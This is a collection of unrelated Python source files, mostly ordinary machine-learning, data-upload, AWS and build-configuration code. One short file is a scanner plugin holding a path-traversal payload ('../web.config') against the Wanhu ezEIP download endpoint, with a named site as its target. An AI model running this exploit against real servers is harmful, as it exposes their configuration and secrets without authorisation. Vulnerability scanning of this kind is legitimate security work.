self.optimizer = optim.Adam(self.parameters(), lr=learning_rate)
def fit(self, data):
prev_log_prob = self.log_prob(data)
with tqdm(range(self.max_iter)) as pbar:
for _iter in pbar:
posterior = self.expectation(data)
self.maximization(data, posterior)
log_prob = self.log_prob(data)
if abs(log_prob - prev_log_prob) / abs(prev_log_prob) < self.rtol:
break
pbar.set_postfix({"log_prob": log_prob})
prev_log_prob = log_prob
def log_prob(self, data):
with torch.no_grad():
prob = torch.stack([dist.log_prob(data).exp() for dist in self.distributions])
mixture_log_prob = self.cluster_ratio.matmul(prob).log().sum()
return mixture_log_prob
def predict(self, data):
return self.expectation(data)
def fit_predict(self, data):
self.fit(data)
return self.predict(data)
def expectation(self, data):
with torch.no_grad():
prob = torch.stack([dist.log_prob(data).exp() for dist in self.distributions])
posterior = self.cluster_ratio.unsqueeze(-1) * prob
return posterior / posterior.sum(dim=0)
def maximization(self, data, posterior):
eps = 1e-7
self.cluster_ratio = posterior.mean(dim=1)
for _step in range(self.maximization_step):
self.optimizer.zero_grad()
log_prob = torch.stack([dist.log_prob(data) for dist in self.distributions])
minus_lower_bound = - ((log_prob + (self.cluster_ratio+eps).log().unsqueeze(-1)) * posterior).mean()
loss = minus_lower_bound # TODO: prior loss
if torch.isnan(loss):
raise NotImplementedError
loss.backward()
self.optimizer.step()
def sample(self, n_sample):
class_sample = torch.multinomial(self.cluster_ratio, n_sample, replacement=True)
return class_sample, torch.stack([self.distributions[i].sample() for i in class_sample])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Warsong
#_PlugName_ = 万户ezeip任意文件下载
#_Function_ = 插件格式
#_FileName_ = whezeip_Download_Anything.py
def assign(service, arg):
if service == "whezeip":
return True, arg
def audit(arg):
payload='download.ashx?files=../web.config'
url=arg+payload
code,head,body,errcode,fina_url=curl.curl(url)
if code == 200 and 'rootRollingFile' in body and 'cachingConfiguration' in body:
security_warning(url)
if __name__ == '__main__':
from dummy import *
audit(assign('whezeip', 'http://www.zsty.org/')[1]) |
import pandas as pd
import logging
from typing import Union
from pathlib import Path
from ecat.tables import reimport_log, reimport, product_code
from ecat.db import Connections
from ecat.classroom import artikel
from ecat.analysis import generate_analysis, compare_data
from ecat.sql import get_template_config, render_sql, series_to_str
from ecat.version import __version__
from datetime import datetime
import warnings
warnings.filterwarnings("ignore")
logger = logging.getLogger(__name__)
format = '%(asctime)s %(message)s'
datefmt='%d %b %y %H:%M:%S'
logging.basicConfig(level=logging.INFO, format=format, datefmt=datefmt)
logger.info(f'ecat version {__version__}')
def classroom_upload(filename: Path, database: str='eCatalogDEV',
last_update: Union[None, str]=None, update: bool=False) -> None:
''' Upload classroom item data to the Baxter eCatalogue database.
The function attempts to capture the process of updating the e-Catalogue
database with class.room database item data:
- For given CSV file import, validate & transform to a pandas dataframe.
- Make a connection to test/production eCatalogue database
- Read reimport_log table to determine last time reimport table
- was updated. Use this date to filter out records in CSV file that
- have been 'updated' since this date.
- Filter the CSV data using the last_updated date.
- Make a connection to the reimport table, check that the columns
- match what is already identified in the CSV data file.
- If no 'missing data' in the CSV, upload the CSV to the reimport table.
Parameters
----------
filename
name of CSV extract file containing articles/item data from class.room
database
name of e-Catalogue database.
Valid values are: eCatalogDEV, eCatalogPRD
last_update
Default None. If None, use the last_update from reimport log table.
Can be specified to manually override reimport log table value or
used for testing.
update
Default False. If True, upload/merge CSV data with reimport table.
Update 'last updated' on reimport log table with filename date.
Returns
-------
None
Example
-------
from ecat.ecat import classroom_upload
filename = Path('inputs') / 'export_artikel_20220204200253.csv'
classroom_upload(filename=filename, database='eCatalogDEV',
last_update='20211102', update=True)
'''
connections = Connections()
con = connections.get_connection(database)
if con is None:
return
if last_update is None:
log_table = reimport_log(connection=con)
last_updated = log_table.get_last_update()
else:
last_updated = datetime.strptime(last_update, '%Y%m%d')
logger.info('')
logger.info('<< ::TEST:: RE-IMPORT DATE - MANUAL OVERRIDE >>')
logger.info('')
logger.info('1. Import classroom data, filter')
classroom_data = artikel(filename)
csv_file_date = classroom_data.get_filename_date()
if csv_file_date < last_updated:
msg = f'CSV file date {csv_file_date} < last DB update {last_updated}'
logger.info(msg)
logger.info(f'NO UPDATE TO eCatalogue database.')
return
df = classroom_data.filter_data(filter_date=last_updated)
if classroom_data.invalid_data():
return
logger.info('')
logger.info('2. Get Reimport table meta-data')
reimport_table = reimport(connection=con)
reimport_columns = reimport_table.get_columns()
if list(df.columns) != list(reimport_columns):
msg = f'Error: CSV cols {len(df.columns)} <> Re-import cols {len(reimport_columns)}'
logger.info(msg)
return
if not update:
logger.info('<< ::TEST:: NO UPDATES MADE >>')
else:
logger.info('')
logger.info('3. Upload classroom item data')
reimport_table.upload(df)
logger.info('')
logger.info('4. Update reimport_log with last update')
log_table = reimport_log(connection=con)
log_table.insert(last_updated)
def classroom_analyse(filename: Path, database: str='eCatalogDEV',
last_update: Union[None, str]=None) -> None:
''' Analyse classroom item data before updating Baxter eCatalogue database.
This function analyses/compares classroom item data.
- Get classroom CSV data, filter by date and identify all item 'keys'
to allow retrieval of corresponding product and p_product data.
- Analyse/compare classroom items with corresponding items in eCAT DB.
Generate Excel workbook showing item, status and whether or not the
classroom item exists in the eCAT product and p_product tables.
- Generate two further 'difference' Excel workbooks showing:
a) Items common to classroom and products
b) Items common to classroom and p_products
Parameters
----------
filename
name of CSV extract file containing articles/item data from class.room
database
name of e-Catalogue database.
Valid values are: eCatalogDEV, eCatalogPRD
last_update
Default None. If None, use the last_update from reimport log table.
Can be specified to manually override reimport log table value or
used for testing.
Returns
-------
None
'''
connections = Connections()
con = connections.get_connection(database)
if con is None:
return
logger.info('')
classroom_data = artikel(filename)
if last_update is None:
log_table = reimport_log(connection=con)
last_updated = log_table.get_last_update()
else:
last_updated = datetime.strptime(last_update, '%Y%m%d')
logger.info('')
logger.info('<< ::TEST:: RE-IMPORT DATE - MANUAL OVERRIDE >>')
logger.info('')
logger.info('1. Import classroom data, filter')
df_classroom = (classroom_data.filter_data(filter_date=last_updated)
.sort_values('PRODUCTCODE_ID'))
if classroom_data.invalid_data():
return
classroom_keys = classroom_data.get_keys()
logger.info('')
logger.info('2. Using classroom item keys, get productcode, p_productcode')
product = product_code(keys=classroom_keys, published=False, connection=con)
df_product = product.get_dataframe(common_fields_only=True)
p_product = product_code(keys=classroom_keys, published=True, connection=con)
df_p_product = p_product.get_dataframe(common_fields_only=True)
logger.info('')
logger.info('3. Analyse classroom items with eCAT DB product data')
df_analysis = generate_analysis(df_classroom, df_product, df_p_product)
logger.info('')
logger.info('4. Compare differences between common classroom & eCAT DB items')
df_common_classroom = classroom_data.get_dataframe(common_fields_only=True)
classroom_items = df_common_classroom['PRODUCTCODE_ID']
# Identify common rows between classroom and product table
keys = df_analysis['PRODUCTCODE_ID'].loc[df_analysis['PRODUCT']].tolist()
df_classroom_product = df_common_classroom[classroom_items.isin(keys)]
df_classroom_product = df_classroom_product.reset_index(drop=True)
# Identify common rows between classroom and p_product table
keys = df_analysis['PRODUCTCODE_ID'].loc[df_analysis['P_PRODUCT']].tolist()
df_classroom_p_product = df_common_classroom[classroom_items.isin(keys)]
df_classroom_p_product = df_classroom_p_product.reset_index(drop=True)
logger.info('')
f ='outputs/ECAT_CSV_vs_PRODUCT.xlsx'
df_compare = compare_data(df_classroom_product, df_product, df_classroom,
table1='csv', table2='product', filename=f)
f ='outputs/ECAT_CSV_vs_P_PRODUCT.xlsx'
df_compare = compare_data(df_classroom_p_product, df_p_product, df_classroom,
table1='csv', table2='p_product', filename=f)
def render_sqls(filename: str=None) -> None:
''' Generate rendered SQL's to update eCatalogue DB
Overview
--------
- Read classroom/ecat analysis workbook.
- Read template/substitution values for each of the
FOUR business rules (to update product/p_product) tables.
- Filter item data and extract associated item codes in
a 'string' list - based on the business cases above.
- Apply above values to the appropriate SQL template and
render/create in an SQL file in the 'outputs' directory.
(look in templates/templates_config.json for details)
Parameters
----------
filename
Excel workbook containing list of classroom items
and corresponding info on whether item exists in
productcode and p_productcode tables in eCatalogue DB
Returns
-------
None
Example
-------
from ecat.ecat import render_sqls
f = 'outputs/20220215_ECAT_Classroom_Item_Analysis - TEST.xlsx'
render_sqls(filename=f)
'''
# Read classroom/ecat analysis summary Excel workbook
df = pd.read_excel(filename)
# Make sure column name spaces replaced with underscores
df.columns = df.columns.str.replace(' ', '_')
template_config = get_template_config()
stage1 = template_config['stage1']
result = df.query("ARTICLE_STATUS != 1000218 and PRODUCT")
stage1['articles'] = series_to_str(result['PRODUCTCODE_ID'])
render_sql(template_sql='UPDATE.sql', template_values=stage1)
stage2 = template_config['stage2']
result = df.query("ARTICLE_STATUS == 10260 and P_PRODUCT")
stage2['articles'] = series_to_str(result['PRODUCTCODE_ID'])
render_sql(template_sql='UPDATE.sql', template_values=stage2)
stage3 = template_config['stage3']
result = df.query("ARTICLE_STATUS == 10260 and not (P_PRODUCT)")
stage3['articles'] = series_to_str(result['PRODUCTCODE_ID'])
render_sql(template_sql='INSERT.sql', template_values=stage3)
stage4 = template_config['stage4']
result = df.query("ARTICLE_STATUS in (10257, 10262, 10263, 10264) and P_PRODUCT")
stage4['articles'] = series_to_str(result['PRODUCTCODE_ID'])
render_sql(template_sql = 'DELETE.sql', template_values=stage4)
|
import torch
class RBM:
def __init__(self, visible_dim, hidden_dim):
self.weights = torch.randn(hidden_dim, visible_dim)
self.hidden_bias = torch.randn(1, hidden_dim)
self.visible_bias = torch.randn(1, visible_dim)
def sample_hidden(self, input):
weighted_input = torch.mm(input, self.weights.t())
activation = weighted_input + self.hidden_bias.expand_as(weighted_input)
prob_h_given_v = torch.sigmoid(activation)
return prob_h_given_v, torch.bernoulli(prob_h_given_v)
def sample_visible(self, hidden_input):
weighted_input = torch.mm(hidden_input, self.weights)
activation = weighted_input + self.visible_bias.expand_as(weighted_input)
prob_v_given_h = torch.sigmoid(activation)
return prob_v_given_h, torch.bernoulli(prob_v_given_h)
def train(self, initial_visible, curr_visible, initial_prob_h, curr_prob_h):
self.weights += torch.mm(initial_visible.t(), initial_prob_h) - torch.mm(curr_visible.t(), curr_prob_h)
self.visible_bias += torch.sum((initial_visible - curr_visible), 0)
self.hidden_bias += torch.sum((initial_prob_h, curr_prob_h), 0)
|
#
# -*- coding: utf-8 -*-
#
# This file is part of reclass
#
from reclass.values import item
from reclass.utils.dictpath import DictPath
from reclass.errors import ResolveError
class RefItem(item.ItemWithReferences):
type = item.ItemTypes.REFERENCE
def assembleRefs(self, context={}):
super(RefItem, self).assembleRefs(context)
try:
strings = [str(i.render(context, None)) for i in self.contents]
value = "".join(strings)
self._refs.append(value)
except ResolveError as e:
self.allRefs = False
def _resolve(self, ref, context):
path = DictPath(self._settings.delimiter, ref)
try:
return path.get_value(context)
except (KeyError, TypeError) as e:
raise ResolveError(ref)
def render(self, context, inventory):
if len(self.contents) == 1:
return self._resolve(self.contents[0].render(context, inventory),
context)
strings = [str(i.render(context, inventory)) for i in self.contents]
return self._resolve("".join(strings), context)
def __str__(self):
strings = [str(i) for i in self.contents]
rs = self._settings.reference_sentinels
return '{0}{1}{2}'.format(rs[0], ''.join(strings), rs[1])
|
from torchvision.models.resnet import ResNet, BasicBlock, Bottleneck
import torch
from torch import nn
class ResNet_LJ(nn.Module):
def __init__(self, model_name, is_FC = True):
super().__init__()
if model_name == 'resnet18':
basic_model = ResNet(block=BasicBlock, layers=[2,2,2,2])
elif model_name == 'resnet34':
basic_model = ResNet(block=BasicBlock, layers=[3,4,6,3])
elif model_name == 'resnet50':
basic_model = ResNet(block=Bottleneck, layers=[3,4,6,3])
elif model_name == 'resnet101':
basic_model = ResNet(block=Bottleneck, layers=[3,4,23,3])
elif model_name == 'resnet152':
basic_model = ResNet(block=Bottleneck, layers=[3,8,36,3])
self.is_FC = is_FC
self.conv1 = basic_model.conv1
self.bn1 = basic_model.bn1
self.relu = basic_model.relu
self.maxpool = basic_model.maxpool
self.layer1 = basic_model.layer1
self.layer2 = basic_model.layer2
self.layer3 = basic_model.layer3
self.layer4 = basic_model.layer4
self.avgpool = basic_model.avgpool
self.fc = basic_model.fc
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
if self.is_FC:
x = self.avgpool(x)
x = x.reshape(x.size(0), -1)
x = self.fc(x)
return x
@classmethod
def from_name(cls, model_name, in_channels=3, is_FC=True):
model = cls(model_name, is_FC)
model._change_in_channels(in_channels)
return model
@classmethod
def from_pretrained(cls, model_name, in_channels=3, model_path = None, is_FC=True):
model = cls(model_name, is_FC)
if model_path:
state_dict = torch.load(model_path)
ret = model.load_state_dict(state_dict, strict=False)
print('Loaded pretrained weights for {}'.format(model_name))
model._change_in_channels(in_channels)
return model
def _change_in_channels(self, in_channels):
"""Adjust model's first convolution layer to in_channels, if in_channels not equals 3.
Args:
in_channels (int): Input data's channel number.
"""
if in_channels != 3:
self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2, padding=3,
bias=False) |
import sys
sys.path.insert(0,'./fms/lambda/global-accelerator-protection')
import boto3
import os
import botocore
import logging
import json
import copy
import cfnresponse
from tag_check import tag_check
logger = logging.getLogger('shieldProtection')
logger.setLevel('DEBUG')
ga_client = boto3.client('globalaccelerator',region_name='us-west-2')
ga_paginator = ga_client.get_paginator('list_accelerators')
shield_client = boto3.client('shield')
shield_paginator = shield_client.get_paginator('list_protections')
def lambda_handler(event, context):
responseData = {}
#List of Hosted Zones
try:
accelerators = (ga_paginator.paginate().build_full_result())['Accelerators']
logger.debug(accelerators)
except botocore.exceptions.ClientError as error:
logger.error(error.response['Error']['Message'])
if 'RequestType' in event:
responseData['Error'] = error.response['Error']
cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "PaginateAccleratorsFailed")
return (error.response['Error']['Message'])
#List of Shield Protected Resources
try:
shieldProtected = (shield_paginator.paginate().build_full_result())['Protections']
logger.debug(shieldProtected)
except botocore.exceptions.ClientError as error:
logger.error(error.response['Error']['Message'])
if 'RequestType' in event:
responseData['Error'] = error.response['Error']
cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "PaginateShieldprotectionFailed")
return (error.response['Error']['Message'])
protectedArns = []
protectionIdList = {}
#Build a list of just resource ARN's for Shield Protected resouces
for s in shieldProtected:
protectedArns.append(s['ResourceArn'])
protectionIdList[s['ResourceArn']] = s['Id']
#If no hosted zones exist, stop gracefully now
if accelerators == []:
logger.info("No Global Accelerators")
return ()
else:
#For each Hosted Zone
for accelerator in accelerators:
logger.debug(accelerator)
acceleratorArn = accelerator['AcceleratorArn']
try:
tags = ga_client.list_tags_for_resource(
ResourceArn=acceleratorArn
)['Tags']
except botocore.exceptions.ClientError as error:
if 'RequestType' in event:
responseData['Error'] = error.response['Error']
cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "listTagsFailed")
logger.error(error.response['Error']['Message'])
return (error.response['Error']['Message'])
#Check resource tags vs. checkTags as include/exclude logic
tagResults = tag_check(tags)
#If the hosted Zone is current Shield Protected
isProtected = acceleratorArn in protectedArns
#If tags match and it isn't protected
if tagResults == True and isProtected == False:
logger.info ("Not protected and should be")
try:
shield_client.create_protection(
Name=accelerator['Name'],
ResourceArn=acceleratorArn)
except botocore.exceptions.ClientError as error:
logger.error(error.response['Error']['Message'])
if 'RequestType' in event:
responseData['Error'] = error.response['Error']
cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "ShieldCreateProtectionFailed")
return (error.response['Error']['Message'])
#If tags do not match requirements and it is Shield protected
elif tagResults == False and isProtected == True:
logger.info ("Protected and should not be")
protectionId = protectionIdList[acceleratorArn]
try:
shield_client.delete_protection(
ProtectionId=protectionId)
except botocore.exceptions.ClientError as error:
logger.error(error.response['Error']['Message'])
if 'RequestType' in event:
responseData['Error'] = error.response['Error']
cfnresponse.send(event, context, cfnresponse.FAILED, responseData, "ShieldDeleteProtectionFailed")
return (error.response['Error']['Message'])
#The other possible results require no change/action for this resource
#Is passed check tags and is already protected
#Did not pass check tags and is not protected
else:
logger.info("No change to protection needed")
if 'RequestType' in event:
cfnresponse.send(event, context, cfnresponse.SUCCESS, responseData, "GAProtectionSucceeded") |
def integral(a_i, h, n):
integ = 0.0
for j in range(n):
a_ij = a_i + (j + 0.5) * h
integ += cos(a_ij) * h
return integ
|
import logging
logging.basicConfig()
logger = logging.getLogger(__name__)
|
import tempfile
import yaml
from utils import shell
import os
import logging
class CloudInit(object):
def __init__(self, run_qcow_path):
self.iso_base_path = run_qcow_path
def _write_metadata(self, vm, filepath):
with open(filepath, 'w') as f:
f.write("instance-id: %s\n" % vm.name)
f.write("local-hostname: %s\n" % vm.name)
def _write_userdata(self, vm, filepath):
mounts = []
for disk in vm.disks:
disk_uuid = disk.get('serial', None)
mount_point = disk.get('mount', None)
fs = disk.get('fs', None)
# We cannot perform mount if there is a mountpoint specified and there is no fs or uuid
if mount_point is not None:
if disk_uuid is None or fs is None:
raise ValueError(f"vm: {vm.name} invalid disk parameters {disk} uuid and fs must be specified")
mounts.append([f"UUID={disk_uuid}", mount_point, fs, "defaults", "0", "0"])
data = {"preserve_hostname": False,
"hostname": vm.name,
"output" : {"all": ">> /var/log/cloud-init.log"},
"mounts" : mounts}
with open(filepath, 'w') as f:
f.write("#cloud-config\n")
yaml.dump(data, f)
def _iso_path(self, vm):
return os.path.join(self.iso_base_path, "%s_%s.iso" % (vm.name, vm.uuid))
def generate_iso(self, vm):
iso_path = self._iso_path(vm)
logging.debug(f"Generating iso for vm {vm.name} iso: {vm.cloud_init_iso}")
with tempfile.TemporaryDirectory() as tmpdir:
user_data = os.path.join(tmpdir, "user-data")
meta_data = os.path.join(tmpdir, "meta-data")
self._write_metadata(vm, meta_data)
self._write_userdata(vm, user_data)
cmd = f"mkisofs -o {iso_path} -V cidata -J -r {user_data} {meta_data}"
shell.run_cmd(cmd)
return iso_path
def delete_iso(self, vm):
iso_path = self._iso_path(vm)
os.remove(iso_path)
|
from cdocs.simple_config import SimpleConfig
import unittest
class ConfigTests(unittest.TestCase):
noise = False
def _print(self, text:str) -> None:
if self.noise:
print(text)
def off(self) -> bool:
return False
def test_get_config_items(self):
self._print(f"ConfigTests.test_get_config_items")
if self.off(): return
cfg = SimpleConfig()
items = cfg.get_items("docs", ["public"])
self._print(f"test_get_config_items: items: {items}")
self.assertEqual( len(items), 4, msg=f"must be 3 items for docs, not {items}" )
items = cfg.get_items("fish")
self.assertEqual( len(items), 0, msg=f"must be 0 items for fish, not {items}" )
def test_get_with_default(self):
self._print(f"ConfigTests.test_get_with_default")
if self.off(): return
cfg = SimpleConfig()
oh = cfg.get("fish", "bats", "yeah!")
self._print(f"test_get_with_default: {oh}")
self.assertEqual( oh, "yeah!", msg="must equal the default value" )
def test_get_matching_key_for_value(self):
self._print(f"ConfigTests.test_get_matching_key_for_value")
if self.off(): return
cfg = SimpleConfig()
name = cfg.get_matching_key_for_value("docs", "/Users/davidkershaw/dev/cdocs/docs/internal")
self._print(f"ConfigTests.test_get_matching_key_for_value: name1: {name}")
self.assertEqual( name, "internal", msg="must equal the 'internal' root" )
name = cfg.get_matching_key_for_value("docs", "fish")
self._print(f"ConfigTests.test_get_matching_key_for_value: name2: {name}")
self.assertNotEqual( name, "internal", msg="must not equal the 'internal' root" )
|
#!/usr/bin/env python
from __future__ import print_function
default_pars = {'nx1': (int,128),
'nx2': (int,1),
'nx3': (int,1),
'nscalars': (int,0),
'gamma' : (float,1.4),
'cfl' : (float,.2),
'x1_min': (float,0.),
'x1_max': (float,1.),
'x2_min': (float,0.),
'x2_max': (float,1.),
'x3_min': (float,0.),
'x3_max' : (float,1.),
'tend' : (float,1.),
'nout0d' : (int,-1),
'nout1d' : (int,-1),
'nout2d' : (int,-1),
'nout3d' : (int,-1),
'maxsteps' : (int,"1e64"),
'outputdir' : (str,'out/'),
'outputname': (str,'fld')}
def default_lines():
lines = "void default_pars(Parameters *params) {\n"
for key,val in default_pars.items():
t,default = val
if key == 'maxsteps':
lines += " params->{} = (long long int){};\n".format(key,str(default))
elif t != str:
lines += " params->{} = {};\n".format(key,str(default))
else:
lines += ' strcpy(params->{},"{}");\n'.format(key,default)
lines += '\n}\n'
return lines
def determine_type(val):
import ast
if val.lower() == 'no' or val.lower() == 'yes':
return bool
try:
return type(ast.literal_eval(val))
except ValueError:
return str
def load_par_file(fname):
with open(fname,'r') as f:
lines = [[y.strip() for y in x.split('=')] for x in f.readlines() if x[0]!='#' and len(x.strip())>0 and '=' in x]
lines = [ [x[0].lower(), x[1]] for x in lines ]
return lines
def read_defs_file(fname):
with open(fname,'r') as f:
lines = [x.strip() for x in f.readlines() if '#define' in x and x[0] == '#' and len(x.strip())>0 ]
return lines
def create_int_block(key,first=False):
if key == 'maxsteps':
if first:
out = r""" if"""
else:
out = r""" else if"""
out += """ (strcmp(name,"{}")==0) """.format(key)
out += """ { params->""" + key + """= (long long int)double_val; PRINT_DOUBLE(name,double_val); }
"""
return out
if first:
out = r""" if"""
else:
out = r""" else if"""
out += """ (strcmp(name,"{}")==0) """.format(key)
out += """ { params->""" + key + """= int_val; PRINT_INT(name,int_val); }
"""
return out
def create_float_block(key,first=False):
if first:
out = r""" if"""
else:
out = r""" else if"""
out += """ (strcmp(name,"{}")==0) """.format(key)
out += """ { params->""" + key + """= double_val; PRINT_DOUBLE(name,double_val); }
"""
return out
def create_bool_block(key,first=False):
if first:
out = r""" if"""
else:
out = r""" else if"""
out += """ (strcmp(name,"{}")==0) """.format(key)
out += """ { params->""" + key + """= bool_val; PRINT_STR(name,str_val); }
"""
return out
def create_string_block(key,first=False):
if first:
out = r""" if"""
else:
out = r""" else if"""
out += """ (strcmp(name,"{}")==0) """.format(key)
out += """ { sprintf(params->""" + key + ""","%s",str_val); PRINT_STR(name,str_val); }
"""
return out
def create_par_file(lines,fname):
output = r"""#include "defs.h"
#include <ctype.h>
#define PRINT_DOUBLE(NAME,VAL) printf("\t%s = %lg\n",NAME,VAL)
#define PRINT_INT(NAME,VAL) printf("\t%s = %d\n",NAME,VAL)
#define PRINT_STR(NAME,VAL) printf("\t%s = %s\n",NAME,VAL)
#define FPRINT_DOUBLE(F,NAME,VAL) fprintf(f,"%s = %lg\n",NAME,VAL)
#define FPRINT_INT(F,NAME,VAL) fprintf(f,"%s = %d\n",NAME,VAL)
#define FPRINT_STR(F,NAME,VAL) fprintf(f,"%s = %s\n",NAME,VAL)
void set_var(char *name,int int_val, double double_val, int bool_val, char *str_val, Parameters *params) {
"""
int_blocks =[]
bool_blocks=[]
float_blocks=[]
str_blocks = []
for i,line in enumerate(default_pars.items()):
key,val = line
t,default = val
key = key.lower()
kargs = {'first': False}
if t is int:
kargs['first'] = len(int_blocks) == 0
int_blocks.append(create_int_block(key,**kargs))
elif t is bool:
bool_blocks.append(create_bool_block(key,**kargs))
elif t is float:
float_blocks.append(create_float_block(key,**kargs))
elif t is str:
str_blocks.append(create_string_block(key,**kargs))
else:
print('{} has no type! Given type '.format(key),t)
for i,line in enumerate(lines):
key,val = line
key = key.lower()
print(line, key, val)
if key not in default_pars:
key = key.lower()
t = determine_type(val)
kargs = {'first': False}
if t is int:
kargs['first'] = len(int_blocks) == 0
int_blocks.append(create_int_block(key,**kargs))
elif t is bool:
bool_blocks.append(create_bool_block(key,**kargs))
elif t is float:
float_blocks.append(create_float_block(key,**kargs))
elif t is str:
str_blocks.append(create_string_block(key,**kargs))
else:
print('{} has no type! Given type '.format(key),t)
output += '\n'.join(int_blocks)
output += '\n'.join(float_blocks)
output += '\n'.join(bool_blocks)
output += '\n'.join(str_blocks)
output += '\nreturn;\n}\n'
output += r"""
void parse_argument(int argc, char *argv[], Parameters *params) {
int j;
unsigned int i;
char name[100],strval[100];
double dval;
int ival;
int bool_val;
char testbool;
for(j=0;j<argc;j++) {
sscanf(argv[j],"%32[^=]=%s",name,strval);
dval = atof(strval);
ival = atoi(strval);
testbool = toupper(strval[0]);
if (testbool == 'Y') bool_val = TRUE;
else bool_val = FALSE;
for (i = 0; i<strlen(name); i++) name[i] = (char)tolower(name[i]);
set_var(name,ival,dval,bool_val,strval,params);
}
return;
}
void read_param_file(char *fname, int argc, char *argv[], Parameters *params) {
FILE *f;
char tok[20] = "\t :=>";
char line[100],name[100],strval[100];
char *data;
double temp;
int status;
int int_val;
int bool_val;
char testbool;
unsigned int i;
f= fopen(fname,"r");
while (fgets(line,100,f)) {
status = sscanf(line,"%s",name);
if (name[0] != '#' && status == 1) {
data = line + (int)strlen(name);
sscanf(data + strspn(data,tok),"%lf",&temp);
sscanf(data + strspn(data,tok),"%s",strval);
int_val = (int)temp;
testbool = toupper(strval[0]);
if (testbool == 'Y') bool_val = TRUE;
else bool_val = FALSE;
for (i = 0; i<strlen(name); i++) name[i] = (char)tolower(name[i]);
set_var(name,int_val,temp,bool_val,strval,params);
}
}
if (argc > 0) {
printf("Redefined on the command line:\n");
parse_argument(argc,argv,params);
}
return;
}
"""
output += default_lines()
with open(fname,'w') as f:
f.write(output)
def create_struct(lines):
out_lines = ['#ifdef ISFLOAT\n#define real float\n#else\n#define real double\n#endif\n',
'typedef struct Parameters {']
for key,val in default_pars.items():
key = key.lower()
t,default = val
if t is int or t is bool:
if key == 'maxsteps':
out_lines.append('\tlong long int {};'.format(key))
else:
out_lines.append('\tint {};'.format(key))
elif t is float:
out_lines.append('\treal {};'.format(key))
elif t is str:
out_lines.append('\tchar {}[512];'.format(key))
else:
print('{} has no type! Given type '.format(key),t)
for line in lines:
key,val = line
if key not in default_pars:
key = key.lower()
t = determine_type(val)
if t is int or t is bool:
out_lines.append('\tint {};'.format(key))
elif t is float:
out_lines.append('\treal {};'.format(key))
elif t is str:
out_lines.append('\tchar {}[512];'.format(key))
else:
print('{} has no type! Given type '.format(key),t)
out_lines.append('} Parameters;\n');
out_lines.append('void read_param_file(char *fname, int argc, char *argv[], Parameters *params);\n')
out_lines.append('void default_pars(Parameters *params);\n')
return out_lines
def add_extra_def(name,args,defs_lines,extra_defs,defname=None):
if args[name.lower()]:
if not any([name.lower() in x.split()[1].lower() for x in defs_lines]):
extra_defs.append('#define {}'.format(name.upper() if defname is None else defname))
return
if __name__ == "__main__":
"""
Pass the directory containing the initialization file,
parameter file, and problem defs.
Example for implosion test located in
src/tests/2D/imp/
src/tests/2D/imp/imp.cu --> init file
src/tests/2D/imp/imp.par --> parameters
src/tests/2D/imp/imp.h --> problem defs
Configure and compile this test using,
./configure -prob src/tests/2D/imp
make
"""
import argparse
import shutil
from subprocess import call
parser = argparse.ArgumentParser()
parser.add_argument('-prob',type=str,default='src/tests/2D/imp',help='Problem directory')
parser.add_argument('--prof',action='store_true',help='Enabling profiling. No outputs will be written.')
parser.add_argument('--silent',action='store_true',help='Silences all output to stdout.')
parser.add_argument('--pcm',action='store_true',help='Piecewise constant reconstruction.')
parser.add_argument('--plm',action='store_true',help='Piecewise linear reconstruction.')
parser.add_argument('--ppm',action='store_true',help='Piecewise parabolic reconstruction.')
parser.add_argument('--ctu',action='store_true',help='Use CTU algorithm.')
parser.add_argument('--de',action='store_true',help='Use the Dual Energy approximation.')
parser.add_argument('-detol',type=float,default=1e-2,help='tolerance for discrepency between internal and kinetic energies. Requires --de flag ')
parser.add_argument('--conduction',action='store_true',help='Enable heat conduction.')
parser.add_argument('--viscosity',action='store_true',help='Enable viscosity.')
parser.add_argument('--potential',action='store_true',help='Enable static gravitational potential.')
parser.add_argument('--hll',action='store_true',help='Use HLL Riemann solver.')
parser.add_argument('--hllc',action='store_true',help='Use HLLC Riemann solver.')
parser.add_argument('--exact',action='store_true',help='Use exact Riemann solver.')
parser.add_argument('--float',action='store_true',help='Use floats instead of doubles.')
parser.add_argument('--dims1',action='store_true',help='1D problem.')
parser.add_argument('--dims2',action='store_true',help='2D problem.')
parser.add_argument('--dims3',action='store_true',help='3D problem.')
args = vars(parser.parse_args())
directory = args['prob']
if directory[-1] != '/':
directory += '/'
problem_name = directory.split('/')[-2]
parfile = directory + problem_name + '.par'
defsfile = directory + problem_name + '.h'
initfile = directory + problem_name + '.cu'
defs_lines = read_defs_file(defsfile)
extra_defs = []
# Number of dims
dims1 = int(args['dims1'])
dims2 = int(args['dims2'])
dims3 = int(args['dims3'])
rsum = dims1 + dims2 + dims3
if rsum > 0:
if rsum > 1:
print('Can only have one of dims1, dims2, dims3 defined!')
exit()
else:
# Check for already defined Riemann solver
defs_lines = list(filter(lambda x: not any([c in x.lower() for c in ['dims1','dims2','dims3']]), defs_lines))
if dims1:
extra_defs.append('#define DIMS1')
if dims2:
extra_defs.append('#define DIMS2')
if dims3:
extra_defs.append('#define DIMS3')
# Riemann solver
hll = int(args['hll'])
hllc = int(args['hllc'])
exact = int(args['exact'])
rsum = hll + hllc + exact
if rsum > 0:
if rsum > 1:
print('Can only have one of HLL, HLLC, EXACT defined!')
exit()
else:
# Check for already defined Riemann solver
defs_lines = list(filter(lambda x: not any([c in x.lower() for c in ['hll','hllc','exact']]), defs_lines))
if hll:
extra_defs.append('#define HLL')
if hllc:
extra_defs.append('#define HLLC')
if exact:
extra_defs.append('#define EXACT')
# Reconstruction
pcm = int(args['pcm'])
plm = int(args['plm'])
ppm = int(args['ppm'])
rsum = pcm + plm + ppm
if rsum > 0:
if rsum > 1:
print('Can only have one of PCM, PLM, PPM defined!')
exit()
else:
# Check for already defined Riemann solver
defs_lines = list(filter(lambda x: not any([c in x.lower() for c in ['pcm','plm','ppm']]), defs_lines))
if pcm:
extra_defs.append('#define PCM')
if plm:
extra_defs.append('#define PLM')
if ppm:
extra_defs.append('#define PPM')
add_extra_def('viscosity',args,defs_lines,extra_defs)
add_extra_def('conduction',args,defs_lines,extra_defs)
